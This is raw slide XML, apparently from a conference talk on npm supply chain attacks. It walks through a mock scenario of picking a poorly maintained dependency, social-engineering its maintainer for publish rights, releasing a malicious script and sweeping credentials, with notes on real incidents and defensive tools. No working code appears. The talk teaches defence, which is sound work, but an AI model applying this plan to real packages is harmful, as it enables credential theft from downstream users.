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292" r:id="rId5"/>
    <p:sldId id="260" r:id="rId6"/>
    <p:sldId id="298" r:id="rId7"/>
    <p:sldId id="259" r:id="rId8"/>
    <p:sldId id="299" r:id="rId9"/>
    <p:sldId id="307" r:id="rId10"/>
    <p:sldId id="261" r:id="rId11"/>
    <p:sldId id="262" r:id="rId12"/>
    <p:sldId id="304" r:id="rId13"/>
    <p:sldId id="291" r:id="rId14"/>
    <p:sldId id="264" r:id="rId15"/>
    <p:sldId id="293" r:id="rId16"/>
    <p:sldId id="267" r:id="rId17"/>
    <p:sldId id="265" r:id="rId18"/>
    <p:sldId id="296" r:id="rId19"/>
    <p:sldId id="297" r:id="rId20"/>
    <p:sldId id="266" r:id="rId21"/>
    <p:sldId id="268" r:id="rId22"/>
    <p:sldId id="269" r:id="rId23"/>
    <p:sldId id="270" r:id="rId24"/>
    <p:sldId id="303" r:id="rId25"/>
    <p:sldId id="281" r:id="rId26"/>
    <p:sldId id="273" r:id="rId27"/>
    <p:sldId id="272" r:id="rId28"/>
    <p:sldId id="274" r:id="rId29"/>
    <p:sldId id="278" r:id="rId30"/>
    <p:sldId id="289" r:id="rId31"/>
    <p:sldId id="290" r:id="rId32"/>
    <p:sldId id="275" r:id="rId33"/>
    <p:sldId id="276" r:id="rId34"/>
    <p:sldId id="277" r:id="rId35"/>
    <p:sldId id="279" r:id="rId36"/>
    <p:sldId id="302" r:id="rId37"/>
    <p:sldId id="294" r:id="rId38"/>
    <p:sldId id="286" r:id="rId39"/>
    <p:sldId id="287" r:id="rId40"/>
    <p:sldId id="280" r:id="rId41"/>
    <p:sldId id="295" r:id="rId42"/>
    <p:sldId id="283" r:id="rId43"/>
    <p:sldId id="288" r:id="rId44"/>
    <p:sldId id="305" r:id="rId45"/>
    <p:sldId id="282" r:id="rId46"/>
    <p:sldId id="285" r:id="rId47"/>
    <p:sldId id="306" r:id="rId48"/>
    <p:sldId id="300" r:id="rId49"/>
    <p:sldId id="28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415688-3E60-3247-ADC9-73C9143B4708}" v="16" dt="2025-11-24T20:41:31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1"/>
    <p:restoredTop sz="84141"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="146" d="100"/>
          <a:sy n="146" d="100"/>
        </p:scale>
        <p:origin x="32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2741E-48B9-6447-8444-A5C3B288E25D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4F21-3735-F345-92EC-40A9F4A3F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5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Also known as a supply chain attack.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9FA5-F556-C92C-EDB0-83ADE849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7FBE9-3181-101D-4E61-3A82FC83B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84393-AAB6-E18B-BE74-4A3FBA60E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Elaborate on dev blogs which talk about their architecture and open source.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visual regression?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Graphic to show the package dependencies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Especially pertinent with the widespread reported use of AI for research purposes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6703-6866-32EB-5089-5125D3E72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69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7EF56-3C51-DDF6-8F8C-7A18387E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3B364-0355-6301-0E54-D4AE93D3A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611E3-DF6F-BE18-E9FB-215EB6A3E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Elaborate on dev blogs which talk about their architecture and open source.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visual regression?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Graphic to show the package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ECC2D-A609-8FC1-6691-6B0A0E4BC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89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the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>snyk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> advisor for the opposite intention, to spot dodgy packages with little maintenance.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ADDFD-41C4-264C-0110-5B57A6EE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D0DC0-0F80-7663-6267-AB07445CE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74E40-E74D-3478-EDE7-A5432D4D7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Elaborate on dev blogs which talk about their architecture and open source.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visual regression?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Graphic to show the package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E693-55F6-6D12-7105-F3A6CADCE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38CA-D21F-2656-1608-D95754D74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8E7B3-B4D9-6D12-9FED-76B11F6AB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E6672-F6F7-017E-1288-C9F4D5BF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Add a github repo here for scenario make it more presonable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97F9E-87D0-50D5-6087-5A8C48B30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01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1F474-2EDE-1684-7441-74EA20711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08BAC8-3803-0553-6546-D09C85DE3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F316C-DE62-7450-58CB-523A36C84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B0A2B-0565-D18C-EC71-5F28B6C26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4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71D4-A6F1-A695-1F96-5F9A5637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22A12-4D29-8051-3A1B-B65F8C17C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0B2BAC-2A97-2313-1711-7C9678A0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Phishing campaign – linter packages hacked as dev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July 18th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"It's this phishing email," wrote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JounQin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a screenshot of a convincing "Verify your account" email he had received:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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Fake tech interview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Lazarus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> North Korean hacker group, posed as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>linkedin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> recruiters and sent engineers tech tests with malicious packages…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vip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> treatment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5AAC0-2275-1F5F-B341-3EE8EC001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4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820BE-A75B-8317-4B47-3BC1C0F1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6B0F0-7008-A859-C0AC-B64C816C7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A3ABD-F553-0904-BCDC-E3116532E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3B78F-DEEE-FE2A-C2DE-43D7F6C4C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00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F1B-9006-934D-995F-FE2C53B1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7402E-7407-0C18-337A-06CA8D46A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9AA5B-FD87-69AD-3BD9-D3E1953AE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aka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 puppets”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F3F6-76CB-9F29-8A9F-391B7C1B7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Package manager mainly for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/node projects..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50% of developers use NPM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Frontend, backend, mobile, desktop,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82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1034-4EA1-CA42-C1B3-035EAC3F5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9BBF2-BC26-7B23-A84F-799E5790C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7522B4-A888-3B1E-8CA6-E2F100ED5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EFFAF-5B8E-0D5C-4B50-D9495B6AC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70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2E195-F80E-F6D2-1061-10F7FB2A7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82182-36F1-7084-EDA4-B3F5D0CF5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5F0F7-0C83-114D-2B52-81F21E04E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98CA0-0442-CCD3-2688-164DDBA64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2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69E7-8094-EB3E-C265-87E5A37F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E662F-FA39-8549-6736-88A4A95E7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C30BC-422D-B08A-77EB-E4C955AC6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7BD0C-E2C9-0FA0-E7C7-6D683D4A0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53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D4B4-361D-6778-E7EE-8C4AD974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84C75-72DE-1095-739F-D7E88DFDD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A5B41-428A-667B-7E4A-C9C3EFF5E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aim is to avoid detection by reviewers, code analysis tools and security researchers through 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obfuscation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steganography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blog.phylum.io</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/fake-aws-packages-ship-command-and-control-malware-in-jpeg-files/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1CFB-982D-0BC6-E50C-E509C9217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98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A235B-5976-2D7D-6A06-A4F1C06E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0FDD4-62DD-76EC-9081-4BF60F756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DBB15-4C64-7901-0362-A26204122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5286-C3AA-8545-3579-F0F2BACEF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57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E614-0C4B-00EE-E2E9-52BFC9DD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A53EC-2860-3103-7159-10B9567CB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B98AB-E4F1-95AD-291A-AD94E9B86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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>npm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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C834C-A250-35DD-B087-D438B382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2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21FA-039D-19D2-2961-B1B701B5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B4CDD-73A6-2A41-1943-498629A1B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24B23-8C9C-A568-6FE9-C03525894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CB41D-1B0B-8D6B-7E15-303EFC184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3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ADD49-1E9C-0266-7C4A-E2F6EFF7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CF288-37C1-8712-6C5F-BFB6E75B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DB305-A77B-753E-3413-31C9C6768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EFA45-AAAB-E628-C91F-04396C9DB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01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0BAA3-2EF0-58B9-B5EF-B05B7C09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6500D-EDBC-EA3F-666B-37028B649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A18BD-BD7D-02A1-EBB2-C3B0C9432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694A6-421E-FB17-05FB-DFF691696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78AE2-DEE6-A2BD-F253-89C7DC41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B8245-71CD-20B9-2371-4FB2B0908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06E66-8244-C557-C8F0-E567FE53F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1A99-B846-BB3C-BB8F-FF37235F2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0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7F53F-88A5-0B9C-FD1C-072C29CC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BAEDC-A4DB-E695-D325-5B464430F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A21D1-3741-34AD-6889-436919E47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Change the meaning for `package`?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Package manager mainly for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/node projects..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package.json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and specifying dependencies?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82DD-C922-0CDA-E107-19E27BDEF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8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F0971-8CBF-7882-F146-9D2A07EC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0384B-624D-FC26-73CF-A243AD35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25AD-6A00-14B3-212C-C9C2C57C7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B3BF8-64A9-E8A4-6EB3-6A48EF862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2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8768-6E17-FA18-B32F-8BC15BA4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3F12E-C874-BF51-C871-80082DC5E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7D29F-AFDD-3D77-3826-046F5819D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CC5BB-A690-A6E3-6A6A-E18A6D2E9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79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82B9D-CAC2-9BB1-9888-E96EA6D2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17E3E-FD9B-B1D2-A312-21EAED0BF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03226-2504-58D2-92E0-8E73A74F2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10BCD-025D-0C34-D0C5-B4F679A78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7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12C4A-C7DC-FB4F-7B46-8531614B7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CF4CA-A57C-AB1E-F9E6-A134D4679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92B25-6E68-C81D-4747-7C1AD23A2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AE72F-452A-E5E2-F65C-B99EC43BF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3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5C2FB-384D-5851-C954-C3381D5E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116C9-E673-A69D-BB2C-774F44F06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14631-AFEA-440B-907F-417EE10B3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DF7B2-DF3B-9710-6B42-A7D09EB09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1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1E04-7BAE-3EA9-3D22-AB77FC2B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D8D8B-E5D3-8436-00C5-84E4F1F64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2E259-8DC7-5B42-568C-FA9774E6F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DE41C-698D-6944-1DCC-14FA023A0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2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A7897-E2E7-8BCC-6B3E-014122B1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098F0-D414-244B-0698-45514160E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20703-209D-BAA5-000B-EDB8D1603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B6C88-8F66-A9CF-684E-423A4441D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8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36EB-6E6C-3E8F-A83B-CC50E7F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BCE8A-2A41-8C2C-59B2-0A12B28A1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47EA3-5D44-D373-234B-6C1EC92C4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AB4B0-613D-9941-17C9-AC66B320F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65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9D24-0D0C-D33D-4F48-982DAAD6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CDF68-95D4-BD53-0C3D-604F113F4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A6FE6-B939-0A86-3369-43A1634FE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DB39A-9847-1C98-6951-D406DBFC9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64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E4E81-6A78-82ED-40CD-E1FE96BA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5FB6C-9C70-1B7B-BA43-059061967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071B7-DA88-17E8-53E8-6A059AC17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71710-1A88-E57E-E058-721B5A8AC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7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2025's State Of Open Conference</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-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=WlQmwAJc5n4&amp;list=PLDlsR_qA-s0gbycSxXNQIF_LhsMThD3Zi&amp;index=10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>opensource.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/article/21/7/burnout-open-source</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>devtechinsights.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/open-source-maintainer-burnout/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1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815F-D9E6-F888-D00D-8631027A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CD846-12FD-42CA-C70B-3B616ECB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B2B62-63D3-3D87-D210-061DB2240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DB3D3-EE2C-8C4B-F185-B56DBBF9B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45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C27F-69ED-DDCC-32F2-F93C2E535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07995-FDF4-14EF-913A-6618219C2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0F8E9-B886-596E-C68F-87F734B61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DF07B-C537-54E1-A21D-062EF9F7D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56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8118-623E-AA99-8172-20BFCD1F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1A5E7-C65B-B26E-2F23-AA120165D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F9A5B-7198-60AD-0C19-7FD182C26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4EAB-EF5A-EDC4-0B58-7478B88ED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5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BEC24-565E-AB9C-01F9-CDF7F5A4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C5205-F851-4F05-864F-26054853F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1A655-C3BC-2E8C-D874-AE509A22A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snyk.io</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/advisor/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cheatsheetseries.owasp.org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NPM_Security_Cheat_Sheet.html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 we add another point around security looking out for rogue network requests??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87F9F-FB4A-8100-3259-AADE85577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05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5973F-2E73-2DD3-9120-8CBEB94D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16483-0FE4-9C39-E14B-5A17C48D9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0EB87-DFFA-B66F-23E2-0C8FB53E6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snyk.io</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/advisor/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cheatsheetseries.owasp.org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NPM_Security_Cheat_Sheet.html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 we add another point around security looking out for rogue network requests??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AC2F6-8414-DCDB-84C4-D73604AA8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36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EF459-7E1F-49D2-F903-6A50804F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BA691-11AA-4049-EB2F-3A113FABC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96325-E125-ED7E-AF4F-BEBFE842D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snyk.io</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/advisor/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cheatsheetseries.owasp.org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NPM_Security_Cheat_Sheet.html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A5AEB-2DAB-4512-4D56-88875E39F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4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E7B2-8F49-34AF-4052-E29D049DE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2E9C2-A31D-3E87-21BE-2C0676759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02052-B667-5968-E433-022818DFC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snyk.io</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/advisor/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cheatsheetseries.owasp.org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NPM_Security_Cheat_Sheet.html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44C59-4C57-14E9-4A93-F3E733326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06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98D3-375E-1F86-539F-A131E7C7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9E15-3320-72E1-7D46-F36ED3AE1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00B0B-332A-2205-6DA0-838556B51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snyk.io</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/advisor/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cheatsheetseries.owasp.org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NPM_Security_Cheat_Sheet.html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C4CAA-9740-EC5E-734D-E58424585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685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CC1C-B4CA-C7B6-4E93-E0D1CE53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7A748-463D-4759-E765-4E1C86CEE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99EF7-02FD-CD00-E0BD-6365AE71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Call back to explain about open source and burnout.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process for releasing a package? i.e. requiring a token from npm to perform the publish.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A1D3-AA12-EC5C-5CE7-54ADE6CD2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4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7741D-211C-2419-31A6-9B62A647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A243F-2A74-480A-1AAE-6B6061926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164F6-F7A5-E404-F418-BAAB15712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2025's State Of Open Conference</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-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=WlQmwAJc5n4&amp;list=PLDlsR_qA-s0gbycSxXNQIF_LhsMThD3Zi&amp;index=10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>opensource.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/article/21/7/burnout-open-source</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>devtechinsights.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/open-source-maintainer-burnout/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EBA8-9404-1038-9DD6-FA2A74D69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3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8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0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7C07-85F8-646B-EBBC-885BF8DAB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B9696-17A7-798E-D55E-3F72EF7B0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93C4C-F7A3-742E-3951-208C32839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E4E30-3E26-4E37-1FE2-3D24204AF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7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4F21-3735-F345-92EC-40A9F4A3FF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7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A274-B4F0-34FC-607E-364947C78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AFA46-AB59-46B1-9D5A-799F04E16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338E-92A7-3F7A-C88F-B4803A2B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0D6C4-2C2F-4154-8B47-417CFB9A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A569-23D1-D686-F6A6-BF41D375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3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428A-F4D1-E5DF-9FDA-EF75120B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F5DDA-71F4-421C-ABF4-9CE2FCF18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815F6-DF16-B9E2-B5CE-2724A580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C363-F2D3-94EA-86AC-6CA5032C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89D9-3DB9-2B53-7471-A7358741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DB4B4-7158-B45B-6850-5AAEE55ED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18C05-CF0B-1847-DE86-D26603D39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DD79D-BBE3-6ABE-021C-35416058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00B5E-9B80-8F85-9EC4-6CBC7FA9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E23E7-BC9B-190E-9743-0A1FDEE8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DC90-5FE4-BCAB-8239-EC39058A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759F-3C4F-9F52-902A-F4DA70D12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6BF90-859D-9992-3B73-AD53A187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E381-4E75-C0EE-4AAF-ACF54145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F4D41-1D68-38E3-AF88-51389FE9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4BE6-BAC2-C851-BDD5-04B3738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D26CD-32FD-4823-2DC0-EE8A152C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797F-CDE9-80C9-B72E-56B944D5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3FE07-B580-103F-1A8B-543B81C1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D798-A3EC-ACBB-583B-2EEDF216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8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45F5-E0E6-F45E-5417-C9C60258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168F5-DA6D-05EE-211E-F92C97E1C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B629C-A7A3-1DAF-0401-1F221A55E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2BE4E-9BB2-5E74-9BBA-9893F57A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C5A8E-A70D-6773-86E0-D90BD627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01E99-29CE-A90D-1D35-8E778DA2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C8E0-0731-A537-441C-A6F75601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085FC-C4E4-918C-4A6A-53E73D98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8A29B-787F-4B44-C884-8B85EAA28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2000D-21FC-5B24-7EF4-9F2551D70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523D3-1FA6-88E7-1391-84109C324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FCAC3-BE66-F5D6-0F73-9491F296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008CD-6956-69DF-8D32-84F9974B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8078C-3A72-B849-53E0-C0C009EB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A333-1315-C54F-748A-ED17EF0E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E70F0-843A-1540-4BAD-DFB4D3C1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DE008-D256-C28F-7785-D1ED9764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5DD9B-6E27-5B4E-21C8-CE22ED01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BD3AD-55FA-C4F8-9E9B-FCE416D0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A6FC-1A74-9AB5-6574-B7110F79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709B0-805F-F799-2041-4000F961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6CE5-4085-A83F-A666-576C1C8A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ECC2-12B5-CADD-037E-2338551C3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3913A-6DDC-474D-7A9E-38BF969F1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0D725-8982-D0A2-7556-2824858F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05A6B-5AF5-5F2A-F06C-0C1CBEBC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C126C-C097-8AD3-8B7D-20945A783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9938-01A2-7200-B037-3E63AD27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D271A-CFCA-5279-3B78-D7D2E13E3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410EE-FD15-56BE-D217-C889AC7C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53B42-FBE9-464F-7770-0FC728E7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F4CC0-05FC-B43A-6FB1-12621B9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3AE12-EFBC-63B0-85E8-A5F04C3D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7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5B073-CF8B-18B0-039A-C15B10DD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78D9A-758F-E0A5-16A2-C7787A417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4C1A5-DB28-AB6A-B85C-1CCDA369E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4D19EE-68C5-CA48-B31E-8DB27F81C39B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566A-8651-F014-F840-3EA49F4EC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2C4E1-CBA5-AEA3-93FC-29A23B8EE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9A0299-B70D-514F-86E0-344EE9A1C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89152C-BD71-5207-1892-7AB78AADF165}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-172780" y="-712384"/>
            <a:ext cx="379848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D964F-6194-A231-A5CA-52B1EDEEE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0386" y="143288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to hack an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4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C259DE-68FD-88F3-43B2-69BFBF73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2887"/>
            <a:ext cx="3557760" cy="35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02F2D1-3F4E-CF05-BE34-15CCD970D320}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5486400" y="4633224"/>
            <a:ext cx="5667022" cy="711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louie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colgan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staff engineer @ flagstone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E68010D4-996D-1430-731C-A93426F8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00" y="4459172"/>
            <a:ext cx="885882" cy="8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1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D4ACB-81F4-9973-75CF-71D6E3DC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2353-91B2-05AB-3D72-B9BD3CDF6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the scenario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7DAF9F-312C-BD74-F4DD-7D6087D3E96B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6CA29-4B9D-DF28-9959-82D7E6CC39F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325705" y="2239450"/>
            <a:ext cx="95405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bravo are hiding the new series of below deck behind a premium+ paywall.</a:t>
            </a:r>
          </a:p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we’re angry. we’ve got nothing to watch.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/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we’re going to hack the bravo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="28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release the new series to everyone out of unfettered rage. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21181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BB67B-F7A6-951C-7EE8-A051D8BE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61D268-297A-8DA2-F9C5-15A6D22C3A14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="8516876" y="1012953"/>
            <a:ext cx="32573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1FD6D-3419-35E6-46CF-A18470C89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4430299" y="2235200"/>
            <a:ext cx="9144000" cy="2387600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:b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the plan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D0C11F-892D-A0B5-8BCA-849579D12857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816A5-8FCF-D779-CCCB-1C2692B0B2CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1919471" y="1012953"/>
            <a:ext cx="54194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research the company.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a package which bravo depend on.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 the package.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sweep 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credentials.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 below deck to everyone.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3074" name="Picture 2" descr="Create meme &quot;Charlie day meme, Charlie day theory, charlie day ...">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F78C870-E5AD-9099-5D15-C6B56B182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12" y="1304693"/>
            <a:ext cx="3670855" cy="42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8D3F5-62E7-DEAF-91DE-D3AEFCA2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09E006-DBA2-890C-B709-C182A86FF694}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="8293850" y="1963801"/>
            <a:ext cx="34149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D1BCB-27B8-A951-0536-6C63651AC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research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A67ED3-B433-ECCC-0F90-41460C4ED674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5470B-7A34-EF4C-1365-0A40D4730663}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325706" y="2239450"/>
            <a:ext cx="53452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bravo and their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have very chatty dev blogs.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notice they share a post about using an open source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see they use a visual regression package from npm.</a:t>
            </a:r>
          </a:p>
          <a:p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examine the package’s dependencies…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04B55-7324-149E-AD8D-FA9CBF8C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64" y="2201083"/>
            <a:ext cx="3767181" cy="39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5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22270-943D-F12B-D5EE-B7859CA4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3856-536D-A296-AA67-3141ADAA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find the target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F99340-1230-E33F-BCF9-A4476FA54E33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9276-A663-1116-B6B7-DB8420DD46A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="768543" y="1935838"/>
            <a:ext cx="6490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“name”: “bravo-viz-tool”,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“main”: “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”,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“dependencies”: {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lodash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”: “^4.3.1”,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“left-pad”: “^1.0.1-alpha”,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“is-even”: “~3.7.9”,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“is-odd”: “~2.4.8”,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“porthole”: “^3.0.1”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7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D3608-BA73-AF73-5546-F7641512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5735-B389-BA16-D7EF-3F7C82F11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find the target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9EDD60-4C9F-81B9-C9D2-7EEC5C690461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7A001-50B4-4A75-20F1-EA2325D1967C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1325705" y="2390637"/>
            <a:ext cx="89716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poor score on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snyk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advisor.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small contributor base.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maintainer has many packages.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a lot of open issues.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 little to no formalized release process.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88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F47FD-DC89-824B-ECF3-E0E506E3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7E8018A-3D62-4D0B-B270-A532802EC915}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7525306" y="1925382"/>
            <a:ext cx="38981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C8A02-1D74-F144-43AE-76460347B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find the target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D14B2B-66D0-C92F-EA7C-B555BFE4456E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FAFAE-8FB0-9A25-BF94-73E232F7D37C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="768543" y="1935838"/>
            <a:ext cx="6490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“name”: “bravo-viz-tool”,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“main”: “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“dependencies”: {</a:t>
            </a:r>
          </a:p>
          <a:p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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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lodash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”: “^4.3.1”,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“left-pad”: “^1.0.1-alpha”,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“is-even”: “~3.7.9”,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“is-odd”: “~2.4.8”,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“porthole”: “^3.0.1”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DBF01-7676-714E-D810-B71CCC0C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06" y="2260574"/>
            <a:ext cx="3498541" cy="3299934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C385763-3666-5ED2-2271-803DF4D05933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807589" y="3269919"/>
            <a:ext cx="2451855" cy="404857"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 55268"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1"/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8EEF07-CA21-B2A0-573C-9AA9F51B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F5EC79-CDCA-4E71-9980-F09DE3E59079}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="519266" y="2229222"/>
            <a:ext cx="4031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07A547-C00A-800F-5AF7-C02118411762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67AE9-4ED7-AD34-B393-D7A17D7D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72" y="2522695"/>
            <a:ext cx="4031852" cy="3383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1ECC4-B1EF-4F69-982B-A728B09F4815}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="977777" y="1313425"/>
            <a:ext cx="1023644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porthole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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a tool to compare two images for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17939-38F3-3F70-4404-45B67EB87195}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7757678" y="3080636"/>
            <a:ext cx="41964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maintains over 50 packages.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 packages haven’t been updated in over a year.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 a github repo but manually releases on npm.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E16DF16-6AAC-9F47-EFAB-3E6F7811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1208" y="1263196"/>
            <a:ext cx="3941618" cy="165261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maintainer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E337078-C334-81E0-4649-4E45A2045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3123335"/>
            <a:ext cx="1454727" cy="2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3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9981F-B3D9-0858-0937-AB46B285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533A-E046-D840-DC4C-4BDBAD3EA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the hack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B31C81-609D-D947-B398-04CF709BC843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74B77-9C9E-574A-8AA3-5E1A0DA3A04E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="921944" y="3945573"/>
            <a:ext cx="4179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social engineering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gain npm publish rights for the package.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45251-49FF-AB7C-0A71-D080241D1E35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6488009" y="3945573"/>
            <a:ext cx="4179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malicious script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the package and release using the publish rights.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8D1E1-C685-F377-5BB7-197CCE660A17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029444" y="1974155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8472072-DB24-F047-E6F7-64DE861A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84" y="2162750"/>
            <a:ext cx="1238636" cy="12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8E59A-8E48-CBA0-67D6-7CC6A0297F54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7615994" y="1957267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CCD443-3671-08C8-1488-0B6F8A158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1" y="2144313"/>
